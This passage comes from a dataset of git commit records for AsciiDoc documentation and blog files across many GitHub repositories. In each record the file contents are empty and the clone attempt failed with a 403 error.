\/hibernate-ogm","old_file":"documentation\/manual\/src\/main\/asciidoc\/en-US\/modules\/mongodb.asciidoc","new_file":"documentation\/manual\/src\/main\/asciidoc\/en-US\/modules\/mongodb.asciidoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/DavideD\/hibernate-ogm-contrib.git\/': The requested URL returned error: 403\n","license":"lgpl-2.1","lang":"AsciiDoc"} {"commit":"2aedacf7a985058e761712ba3c8dccd1c0c4a6ed","subject":"OGM-555 Updating reference documentation","message":"OGM-555 Updating reference documentation\n","repos":"tempbottle\/hibernate-ogm,hibernate\/hibernate-ogm,DavideD\/hibernate-ogm,uugaa\/hibernate-ogm,hibernate\/hibernate-ogm,DavideD\/hibernate-ogm-cassandra,Sanne\/hibernate-ogm,gunnarmorling\/hibernate-ogm,uugaa\/hibernate-ogm,DavideD\/hibernate-ogm,hibernate\/hibernate-ogm,DavideD\/hibernate-ogm-contrib,DavideD\/hibernate-ogm-contrib,mp911de\/hibernate-ogm,gunnarmorling\/hibernate-ogm,uugaa\/hibernate-ogm,schernolyas\/hibernate-ogm,ZJaffee\/hibernate-ogm,DavideD\/hibernate-ogm-cassandra,DavideD\/hibernate-ogm-contrib,schernolyas\/hibernate-ogm,mp911de\/hibernate-ogm,gunnarmorling\/hibernate-ogm,tempbottle\/hibernate-ogm,schernolyas\/hibernate-ogm,Sanne\/hibernate-ogm,DavideD\/hibernate-ogm-cassandra,Sanne\/hibernate-ogm,hibernate\/hibernate-ogm,tempbottle\/hibernate-ogm,ZJaffee\/hibernate-ogm,ZJaffee\/hibernate-ogm,DavideD\/hibernate-ogm,Sanne\/hibernate-ogm,mp911de\/hibernate-ogm,DavideD\/hibernate-ogm","old_file":"documentation\/manual\/src\/main\/asciidoc\/en-US\/modules\/mongodb.asciidoc","new_file":"documentation\/manual\/src\/main\/asciidoc\/en-US\/modules\/mongodb.asciidoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/DavideD\/hibernate-ogm-contrib.git\/': The requested URL returned error: 403\n","license":"lgpl-2.1","lang":"AsciiDoc"} {"commit":"3971892e466a61c453a1b46b345d0468fd30fc99","subject":"Fixed a technical error","message":"Fixed a technical error\n","repos":"cjdb\/cs6771-16s2,cjdb\/cs6771-16s2","old_file":"asciidoc\/week03.asciidoc","new_file":"asciidoc\/week03.asciidoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/cjdb\/cs6771-16s2.git\/': The requested URL returned error: 403\n","license":"apache-2.0","lang":"AsciiDoc"} 
{"commit":"23aad71550cc339178f830702077abb2a296c772","subject":"2016-07-12-sister.adoc","message":"2016-07-12-sister.adoc\n","repos":"evolgenomology\/evolgenomology.github.io,evolgenomology\/evolgenomology.github.io,evolgenomology\/evolgenomology.github.io,evolgenomology\/evolgenomology.github.io","old_file":"_posts\/2016-07-12-sister.adoc","new_file":"_posts\/2016-07-12-sister.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/evolgenomology\/evolgenomology.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"a3c22dc10c8147146841c32ae556230ccad66f74","subject":"Update 2016-11-11-Pepper.adoc","message":"Update 2016-11-11-Pepper.adoc","repos":"innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io","old_file":"_posts\/2016-11-11-Pepper.adoc","new_file":"_posts\/2016-11-11-Pepper.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/innovation-jp\/innovation-jp.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"3e5bfd11f639f04d7cc9bee25e2c282622689013","subject":"Update 2016-11-14-python.adoc","message":"Update 2016-11-14-python.adoc","repos":"zhuo2015\/zhuo2015.github.io,zhuo2015\/zhuo2015.github.io,zhuo2015\/zhuo2015.github.io,zhuo2015\/zhuo2015.github.io","old_file":"_posts\/2016-11-14-python.adoc","new_file":"_posts\/2016-11-14-python.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/zhuo2015\/zhuo2015.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"3dbbfa861398eecbad83e6c50738f247dd9ad2e5","subject":"Update 2018-07-08-Gohttp.adoc","message":"Update 2018-07-08-Gohttp.adoc","repos":"innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io","old_file":"_posts\/2018-07-08-Gohttp.adoc","new_file":"_posts\/2018-07-08-Gohttp.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/innovation-jp\/innovation-jp.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"e669f31eef2ad21a0e291d192ac44f4c5ae2959f","subject":"Create 2016-07-16-Test-Post.adoc","message":"Create 2016-07-16-Test-Post.adoc","repos":"holtalanm\/holtalanm.github.io,holtalanm\/holtalanm.github.io,holtalanm\/holtalanm.github.io,holtalanm\/holtalanm.github.io","old_file":"_posts\/2016-07-16-Test-Post.adoc","new_file":"_posts\/2016-07-16-Test-Post.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/holtalanm\/holtalanm.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"e4820d2117d9c75fc023fd1a977f6207b348aa2b","subject":"Update 2017-07-19-Mentoring.adoc","message":"Update 2017-07-19-Mentoring.adoc","repos":"scottellis64\/scottellis64.github.io,scottellis64\/scottellis64.github.io,scottellis64\/scottellis64.github.io,scottellis64\/scottellis64.github.io","old_file":"_posts\/2017-07-19-Mentoring.adoc","new_file":"_posts\/2017-07-19-Mentoring.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 
'https:\/\/github.com\/scottellis64\/scottellis64.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"77b47f0eff1e366c9ef7ef1a201387720bc7c880","subject":"Update 2019-04-22-Cloud-Run.adoc","message":"Update 2019-04-22-Cloud-Run.adoc","repos":"innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io","old_file":"_posts\/2019-04-22-Cloud-Run.adoc","new_file":"_posts\/2019-04-22-Cloud-Run.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/innovation-jp\/innovation-jp.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"62fbb80511c051c431044ef42609123e80893ccd","subject":"Update 2015-12-22-Flask-Form-and-Login.adoc","message":"Update 2015-12-22-Flask-Form-and-Login.adoc","repos":"milantracy\/milantracy.github.io,milantracy\/milantracy.github.io,milantracy\/milantracy.github.io","old_file":"_posts\/2015-12-22-Flask-Form-and-Login.adoc","new_file":"_posts\/2015-12-22-Flask-Form-and-Login.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/milantracy\/milantracy.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"4c5ff29a2bfd2b1f751beb344dc6fc831d680dd1","subject":"create Korean translation for Administration.adoc","message":"create Korean translation for Administration.adoc\n","repos":"anthonny\/dev.hubpress.io,anthonny\/dev.hubpress.io,anthonny\/dev.hubpress.io,anthonny\/dev.hubpress.io,anthonny\/dev.hubpress.io","old_file":"docs\/Administration-ko.adoc","new_file":"docs\/Administration-ko.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/anthonny\/dev.hubpress.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"76ad9cebb0c60a160a726250b91e7cee6d2ad56e","subject":"Update 2017-11-06-api-blueprint.adoc","message":"Update 2017-11-06-api-blueprint.adoc","repos":"innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io","old_file":"_posts\/2017-11-06-api-blueprint.adoc","new_file":"_posts\/2017-11-06-api-blueprint.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/innovation-jp\/innovation-jp.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"63e0140628f7bdfc7725d3def002d5855b5ab6bd","subject":"Add contributing document","message":"Add contributing document\n","repos":"dtrunk90\/spring-social-facebook,spring-projects\/spring-social-facebook,spring-projects\/spring-social-facebook,dtrunk90\/spring-social-facebook","old_file":"CONTRIBUTING.adoc","new_file":"CONTRIBUTING.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/dtrunk90\/spring-social-facebook.git\/': The requested URL returned error: 403\n","license":"apache-2.0","lang":"AsciiDoc"} {"commit":"e7edb77caec8efec358bc0a88865f900e376bb43","subject":"SEC-2716: Fix doc spelling of AbstractPreAuthenticatedProcessingFilter","message":"SEC-2716: Fix doc spelling of 
AbstractPreAuthenticatedProcessingFilter\n","repos":"raindev\/spring-security,kazuki43zoo\/spring-security,ajdinhedzic\/spring-security,driftman\/spring-security,kazuki43zoo\/spring-security,spring-projects\/spring-security,fhanik\/spring-security,Peter32\/spring-security,pwheel\/spring-security,SanjayUser\/SpringSecurityPro,izeye\/spring-security,SanjayUser\/SpringSecurityPro,hippostar\/spring-security,caiwenshu\/spring-security,liuguohua\/spring-security,fhanik\/spring-security,diegofernandes\/spring-security,ractive\/spring-security,Xcorpio\/spring-security,yinhe402\/spring-security,raindev\/spring-security,mounb\/spring-security,mrkingybc\/spring-security,MatthiasWinzeler\/spring-security,Xcorpio\/spring-security,xingguang2013\/spring-security,eddumelendez\/spring-security,zgscwjm\/spring-security,jgrandja\/spring-security,zhaoqin102\/spring-security,zgscwjm\/spring-security,adairtaosy\/spring-security,Krasnyanskiy\/spring-security,diegofernandes\/spring-security,ajdinhedzic\/spring-security,mrkingybc\/spring-security,xingguang2013\/spring-security,Krasnyanskiy\/spring-security,ollie314\/spring-security,adairtaosy\/spring-security,cyratech\/spring-security,hippostar\/spring-security,pkdevbox\/spring-security,mdeinum\/spring-security,wkorando\/spring-security,vitorgv\/spring-security,wkorando\/spring-security,cyratech\/spring-security,eddumelendez\/spring-security,pkdevbox\/spring-security,MatthiasWinzeler\/spring-security,likaiwalkman\/spring-security,olezhuravlev\/spring-security,spring-projects\/spring-security,mparaz\/spring-security,jgrandja\/spring-security,mparaz\/spring-security,spring-projects\/spring-security,mdeinum\/spring-security,rwinch\/spring-security,eddumelendez\/spring-security,mparaz\/spring-security,pwheel\/spring-security,kazuki43zoo\/spring-security,likaiwalkman\/spring-security,thomasdarimont\/spring-security,forestqqqq\/spring-security,wkorando\/spring-security,kazuki43zoo\/spring-security,Krasnyanskiy\/spring-security,liuguohua\/spring-security,panchenko\/spring-security,zshift\/spring-security,caiwenshu\/spring-security,jmnarloch\/spring-security,fhanik\/spring-security,Peter32\/spring-security,djechelon\/spring-security,Peter32\/spring-security,jgrandja\/spring-security,liuguohua\/spring-security,chinazhaoht\/spring-security,adairtaosy\/spring-security,Krasnyanskiy\/spring-security,zhaoqin102\/spring-security,caiwenshu\/spring-security,thomasdarimont\/spring-security,Peter32\/spring-security,jmnarloch\/spring-security,driftman\/spring-security,spring-projects\/spring-security,pwheel\/spring-security,follow99\/spring-security,fhanik\/spring-security,spring-projects\/spring-security,pwheel\/spring-security,chinazhaoht\/spring-security,olezhuravlev\/spring-security,eddumelendez\/spring-security,rwinch\/spring-security,zshift\/spring-security,wkorando\/spring-security,ollie314\/spring-security,raindev\/spring-security,rwinch\/spring-security,cyratech\/spring-security,olezhuravlev\/spring-security,thomasdarimont\/spring-security,ajdinhedzic\/spring-security,chinazhaoht\/spring-security,follow99\/spring-security,djechelon\/spring-security,mrkingybc\/spring-security,MatthiasWinzeler\/spring-security,spring-projects\/spring-security,panchenko\/spring-security,ollie314\/spring-security,driftman\/spring-security,MatthiasWinzeler\/spring-security,jgrandja\/spring-security,olezhuravlev\/spring-security,spring-projects\/spring-security,fhanik\/spring-security,hippostar\/spring-security,diegofernandes\/spring-security,pkdevbox\/spring-security,rwinch\/spring-security,xinggu
ang2013\/spring-security,panchenko\/spring-security,thomasdarimont\/spring-security,vitorgv\/spring-security,ractive\/spring-security,xingguang2013\/spring-security,fhanik\/spring-security,pkdevbox\/spring-security,pwheel\/spring-security,yinhe402\/spring-security,liuguohua\/spring-security,zshift\/spring-security,izeye\/spring-security,rwinch\/spring-security,olezhuravlev\/spring-security,thomasdarimont\/spring-security,djechelon\/spring-security,eddumelendez\/spring-security,ractive\/spring-security,jmnarloch\/spring-security,mounb\/spring-security,ractive\/spring-security,yinhe402\/spring-security,vitorgv\/spring-security,driftman\/spring-security,kazuki43zoo\/spring-security,mdeinum\/spring-security,izeye\/spring-security,SanjayUser\/SpringSecurityPro,jmnarloch\/spring-security,mparaz\/spring-security,jgrandja\/spring-security,hippostar\/spring-security,yinhe402\/spring-security,zgscwjm\/spring-security,Xcorpio\/spring-security,forestqqqq\/spring-security,SanjayUser\/SpringSecurityPro,djechelon\/spring-security,rwinch\/spring-security,follow99\/spring-security,mdeinum\/spring-security,mounb\/spring-security,zshift\/spring-security,adairtaosy\/spring-security,follow99\/spring-security,zgscwjm\/spring-security,Xcorpio\/spring-security,likaiwalkman\/spring-security,ajdinhedzic\/spring-security,panchenko\/spring-security,SanjayUser\/SpringSecurityPro,raindev\/spring-security,mrkingybc\/spring-security,zhaoqin102\/spring-security,likaiwalkman\/spring-security,forestqqqq\/spring-security,djechelon\/spring-security,cyratech\/spring-security,zhaoqin102\/spring-security,jgrandja\/spring-security,caiwenshu\/spring-security,mounb\/spring-security,diegofernandes\/spring-security,izeye\/spring-security,chinazhaoht\/spring-security,forestqqqq\/spring-security,vitorgv\/spring-security,ollie314\/spring-security","old_file":"docs\/manual\/src\/asciidoc\/index.adoc","new_file":"docs\/manual\/src\/asciidoc\/index.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/jmnarloch\/spring-security.git\/': The requested URL returned error: 403\n","license":"apache-2.0","lang":"AsciiDoc"} {"commit":"e1441562f86ad343fbea85b0bf1bf36cef5f8f2e","subject":"Create best-practices.adoc","message":"Create best-practices.adoc\n\nCloses https:\/\/github.com\/platosha\/angular-polymer\/issues\/92 and https:\/\/github.com\/platosha\/angular-polymer\/issues\/96","repos":"platosha\/angular-polymer,platosha\/angular-polymer,platosha\/angular-polymer,vaadin\/angular2-polymer,vaadin\/angular2-polymer","old_file":"docs\/best-practices.adoc","new_file":"docs\/best-practices.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/vaadin\/angular2-polymer.git\/': The requested URL returned error: 403\n","license":"apache-2.0","lang":"AsciiDoc"} {"commit":"2dbb4b6dd99608ae9d604971822b09e29dd104f1","subject":"Update 2016-07-20-vim.adoc","message":"Update 2016-07-20-vim.adoc","repos":"innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io","old_file":"_posts\/2016-07-20-vim.adoc","new_file":"_posts\/2016-07-20-vim.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/innovation-jp\/innovation-jp.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} 
{"commit":"e8c74cd4bd24d018b155b381ba26d29af17b76a4","subject":"Corrected a typo","message":"Corrected a typo","repos":"pombredanne\/django-hstore,Stranger6667\/django-hstore,pombredanne\/django-hstore,pombredanne\/django-hstore,Stranger6667\/django-hstore,djangonauts\/django-hstore,pombredanne\/django-hstore,Stranger6667\/django-hstore,djangonauts\/django-hstore,djangonauts\/django-hstore,djangonauts\/django-hstore,Stranger6667\/django-hstore","old_file":"doc\/doc.asciidoc","new_file":"doc\/doc.asciidoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/djangonauts\/django-hstore.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"2ec61cb9e5c2baad08f408310629522ecb8c551f","subject":"Update 2017-10-27-Nginxngx-small-lightminio-S3-Docker.adoc","message":"Update 2017-10-27-Nginxngx-small-lightminio-S3-Docker.adoc","repos":"innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io","old_file":"_posts\/2017-10-27-Nginxngx-small-lightminio-S3-Docker.adoc","new_file":"_posts\/2017-10-27-Nginxngx-small-lightminio-S3-Docker.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/innovation-jp\/innovation-jp.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"9f63f0da8ba0af52e30780e977ea830688fb56ff","subject":"Documented the prefixes of html ids","message":"Documented the prefixes of html ids\n","repos":"uclouvain\/osis_louvain,uclouvain\/osis,uclouvain\/OSIS-Louvain,uclouvain\/osis_louvain,uclouvain\/osis,uclouvain\/OSIS-Louvain,uclouvain\/OSIS-Louvain,uclouvain\/osis_louvain,uclouvain\/osis,uclouvain\/osis","old_file":"doc\/technical-manual.adoc","new_file":"doc\/technical-manual.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/uclouvain\/osis.git\/': The requested URL returned error: 403\n","license":"agpl-3.0","lang":"AsciiDoc"} {"commit":"81739d605b63bb18a90ab576b02ed9fc49b362b0","subject":"jeeconf included","message":"jeeconf included\n","repos":"tsypuk\/springrestdoc","old_file":"restdocs\/src\/docs\/asciidoc\/etc\/public.adoc","new_file":"restdocs\/src\/docs\/asciidoc\/etc\/public.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/tsypuk\/springrestdoc.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"5e0688df72e16c25e088d5d70036a1c2a118e986","subject":"Doc structure changes","message":"Doc structure changes\n\nIntroduce a top level doc that aggregates various sub docs\n","repos":"spring-cloud\/spring-cloud-stream,spring-cloud\/spring-cloud-stream,garyrussell\/spring-cloud-stream,spring-cloud\/spring-cloud-stream,garyrussell\/spring-cloud-stream,garyrussell\/spring-cloud-stream","old_file":"spring-cloud-stream-binder-kafka-docs\/src\/main\/asciidoc\/spring-cloud-stream-binder-kafka-aggregate.adoc","new_file":"spring-cloud-stream-binder-kafka-docs\/src\/main\/asciidoc\/spring-cloud-stream-binder-kafka-aggregate.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/garyrussell\/spring-cloud-stream.git\/': The requested URL returned error: 403\n","license":"apache-2.0","lang":"AsciiDoc"} 
{"commit":"c323210b8eaf2168c6729ec835ee192169fece2c","subject":"minor rx-stats","message":"minor rx-stats\n","repos":"dimagol\/trex-core,dimagol\/trex-core,dimagol\/trex-core,kisel\/trex-core,kisel\/trex-core,kisel\/trex-core,kisel\/trex-core,dimagol\/trex-core,kisel\/trex-core,kisel\/trex-core,dimagol\/trex-core,dimagol\/trex-core","old_file":"draft_trex_stateless.asciidoc","new_file":"draft_trex_stateless.asciidoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/kisel\/trex-core.git\/': The requested URL returned error: 403\n","license":"apache-2.0","lang":"AsciiDoc"} {"commit":"56011d3761897ee547d139f219aa89f53fd5ded6","subject":"Update 2018-11-27-Laravel-Nexmo-S-M-S.adoc","message":"Update 2018-11-27-Laravel-Nexmo-S-M-S.adoc","repos":"innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io","old_file":"_posts\/2018-11-27-Laravel-Nexmo-S-M-S.adoc","new_file":"_posts\/2018-11-27-Laravel-Nexmo-S-M-S.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/innovation-jp\/innovation-jp.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"426e4914bd359f7e9f842fdb97eba899d29d7872","subject":"Doc for Quickstart","message":"Doc for Quickstart\n\nChange-Id: Icd07c623bd340d66297d72063a1255b38d36fcea\nReviewed-on: http:\/\/gerrit.cloudera.org:8080\/933\nReviewed-by: Misty Stanley-Jones <b9f9ef9e00c258208ea831c64cc129eda4ac78b4@apache.org>\nTested-by: Misty Stanley-Jones <b9f9ef9e00c258208ea831c64cc129eda4ac78b4@apache.org>\n","repos":"andrwng\/kudu,cloudera\/kudu,InspurUSA\/kudu,andrwng\/kudu,EvilMcJerkface\/kudu,EvilMcJerkface\/kudu,helifu\/kudu,InspurUSA\/kudu,andrwng\/kudu,andrwng\/kudu,andrwng\/kudu,helifu\/kudu,InspurUSA\/kudu,EvilMcJerkface\/kudu,cloudera\/kudu,helifu\/kudu,EvilMcJerkface\/kudu,cloudera\/kudu,InspurUSA\/kudu,InspurUSA\/kudu,InspurUSA\/kudu,cloudera\/kudu,cloudera\/kudu,helifu\/kudu,cloudera\/kudu,andrwng\/kudu,helifu\/kudu,InspurUSA\/kudu,helifu\/kudu,EvilMcJerkface\/kudu,cloudera\/kudu,helifu\/kudu,EvilMcJerkface\/kudu,EvilMcJerkface\/kudu,helifu\/kudu,EvilMcJerkface\/kudu,cloudera\/kudu,helifu\/kudu,InspurUSA\/kudu,andrwng\/kudu,InspurUSA\/kudu,andrwng\/kudu,EvilMcJerkface\/kudu,cloudera\/kudu,andrwng\/kudu","old_file":"docs\/quickstart.adoc","new_file":"docs\/quickstart.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/InspurUSA\/kudu.git\/': The requested URL returned error: 403\n","license":"apache-2.0","lang":"AsciiDoc"} {"commit":"83b0e6675ef0246424d3dee29694731ffd9fa404","subject":"Init Project","message":"Init Project\n","repos":"bindstone\/graphbank,bindstone\/graphbank,bindstone\/graphbank,bindstone\/graphbank,bindstone\/graphbank,bindstone\/graphbank","old_file":"readme.adoc","new_file":"readme.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/bindstone\/graphbank.git\/': The requested URL returned error: 403\n","license":"apache-2.0","lang":"AsciiDoc"} {"commit":"9b2475df4785d2c1a610900fa3e5f17334a761e5","subject":"initial commit","message":"initial 
commit\n","repos":"wombat\/kubernetes-aws-workshop,arun-gupta\/kubernetes-aws-workshop,dalbhanj\/kubernetes-aws-workshop,dalbhanj\/kubernetes-aws-workshop,dalbhanj\/kubernetes-aws-workshop,arun-gupta\/kubernetes-aws-workshop,arun-gupta\/kubernetes-aws-workshop,arun-gupta\/kubernetes-aws-workshop,dalbhanj\/kubernetes-aws-workshop","old_file":"readme.adoc","new_file":"readme.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/wombat\/kubernetes-aws-workshop.git\/': The requested URL returned error: 403\n","license":"apache-2.0","lang":"AsciiDoc"} {"commit":"0edc9d5eccfadf529e5381032e600829dbc23782","subject":"Readme gratipay","message":"Readme gratipay\n","repos":"hypatia-software-org\/hypatia-engine,Applemann\/hypatia,hypatia-software-org\/hypatia-engine,lillian-lemmer\/hypatia,brechin\/hypatia,Applemann\/hypatia,brechin\/hypatia,lillian-lemmer\/hypatia","old_file":"readme.adoc","new_file":"readme.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/hypatia-software-org\/hypatia-engine.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"3b3d3f0def42b96cc1313e59cb6a5a4bd086b097","subject":"Add date formats","message":"Add date formats\n","repos":"brianary\/brianary.github.io","old_file":"date-formats.adoc","new_file":"date-formats.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/brianary\/brianary.github.io.git\/': The requested URL returned error: 403\n","license":"cc0-1.0","lang":"AsciiDoc"} {"commit":"c91f01ce7ed5e67ae7e052d6eac11b6b46c8df90","subject":"Update 2016-09-23-wtf-log.adoc","message":"Update 2016-09-23-wtf-log.adoc","repos":"innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io","old_file":"_posts\/2016-09-23-wtf-log.adoc","new_file":"_posts\/2016-09-23-wtf-log.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/innovation-jp\/innovation-jp.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"884732af59c2585e1e3e47c654e9faf509495562","subject":"Update 2017-04-14-Azure-3.adoc","message":"Update 2017-04-14-Azure-3.adoc","repos":"innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io","old_file":"_posts\/2017-04-14-Azure-3.adoc","new_file":"_posts\/2017-04-14-Azure-3.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/innovation-jp\/innovation-jp.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"49c558f5c7ef42112338da57e95f47fb8112f364","subject":"Update 2017-07-04-Azure-5.adoc","message":"Update 2017-07-04-Azure-5.adoc","repos":"innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io","old_file":"_posts\/2017-07-04-Azure-5.adoc","new_file":"_posts\/2017-07-04-Azure-5.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/innovation-jp\/innovation-jp.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} 
{"commit":"968790e1d8afcda1d6e289382449eae71207b13b","subject":"Create Vim.adoc","message":"Create Vim.adoc","repos":"smru\/Documentation,smru\/Documentation","old_file":"Linux\/Vim.adoc","new_file":"Linux\/Vim.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/smru\/Documentation.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"6a333440d448196353e88e70fde871fbb308517a","subject":"Update 2015-07-10-Welcome-to-GWCATT.adoc","message":"Update 2015-07-10-Welcome-to-GWCATT.adoc","repos":"GWCATT\/gwcatt.github.io,GWCATT\/gwcatt.github.io,GWCATT\/gwcatt.github.io","old_file":"_posts\/2015-07-10-Welcome-to-GWCATT.adoc","new_file":"_posts\/2015-07-10-Welcome-to-GWCATT.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/GWCATT\/gwcatt.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"8db3430fe149bd9e4d4a23c445c848227bdfce30","subject":"Update 2015-09-22-Initialization-and-Cleanup.adoc","message":"Update 2015-09-22-Initialization-and-Cleanup.adoc","repos":"milantracy\/milantracy.github.io,milantracy\/milantracy.github.io,milantracy\/milantracy.github.io","old_file":"_posts\/2015-09-22-Initialization-and-Cleanup.adoc","new_file":"_posts\/2015-09-22-Initialization-and-Cleanup.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/milantracy\/milantracy.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"182988ab77e1a6d47bddf5672c2d97487891da61","subject":"Update 2015-10-12-A-Bureaucratic-Ethnography.adoc","message":"Update 2015-10-12-A-Bureaucratic-Ethnography.adoc","repos":"Cribstone\/humblehacker,Cribstone\/humblehacker,Cribstone\/humblehacker","old_file":"_posts\/2015-10-12-A-Bureaucratic-Ethnography.adoc","new_file":"_posts\/2015-10-12-A-Bureaucratic-Ethnography.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/Cribstone\/humblehacker.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"e7251cac54945854142432db9dc601ba5b7c9ad6","subject":"y2b create post The World's Thinnest Laptop!","message":"y2b create post The World's Thinnest Laptop!","repos":"live-smart\/live-smart.github.io,live-smart\/live-smart.github.io,live-smart\/live-smart.github.io,live-smart\/live-smart.github.io","old_file":"_posts\/2016-04-05-The-Worlds-Thinnest-Laptop.adoc","new_file":"_posts\/2016-04-05-The-Worlds-Thinnest-Laptop.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/live-smart\/live-smart.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"9b4f8fcd4f45761cb866bc1bf1dbf1f6964e1e5d","subject":"Update 2019-02-10-RTFM-Episode-0x01.adoc","message":"Update 